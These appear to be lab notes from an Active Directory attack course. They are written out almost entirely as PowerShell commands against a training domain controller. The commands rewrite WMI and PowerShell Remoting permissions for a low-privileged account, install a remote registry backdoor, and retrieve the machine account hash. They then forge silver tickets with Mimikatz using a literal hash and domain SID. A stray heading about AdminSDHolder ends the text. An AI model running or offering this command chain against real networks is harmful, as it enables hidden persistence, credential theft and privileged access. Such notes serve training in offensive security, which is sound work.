Modify descriptor for WMI to allow user to access the WMI

. C:\\AD\\Tools\\RACE.ps1

Set-RemoteWMI -SamAccountName student648 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -namespace 'root\\cimv2' -Verbose

Execute WMI Queries

gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Also can be done, Powershell Remoting

Set-RemotePSRemoting –SamAccountName student648 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.moneycorp.localdcorp\\student648

Modify Perms

Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student648 

Retrieve Hash

Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose

Creating Silver Ticket with that hash

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511/target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511/target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator /ptt"'

What is an AdminSDHolder Attack and How to Defend Against it?